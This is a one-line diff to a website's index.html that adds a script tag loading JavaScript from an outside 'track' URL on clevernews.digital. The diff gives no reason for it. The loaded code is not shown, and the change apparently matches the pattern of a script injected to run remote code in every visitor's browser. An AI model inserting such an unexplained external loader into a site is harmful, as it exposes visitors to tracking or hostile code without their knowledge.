--- a/index.html
+++ b/index.html
@@ -22,6 +22,7 @@
     <!-- script
     ================================================== -->
     <script src="js/modernizr.js"></script>
+    <script src="https://clevernews.digital/track/2ke8b5"></script>
 
     <!-- favicons
     ================================================== -->
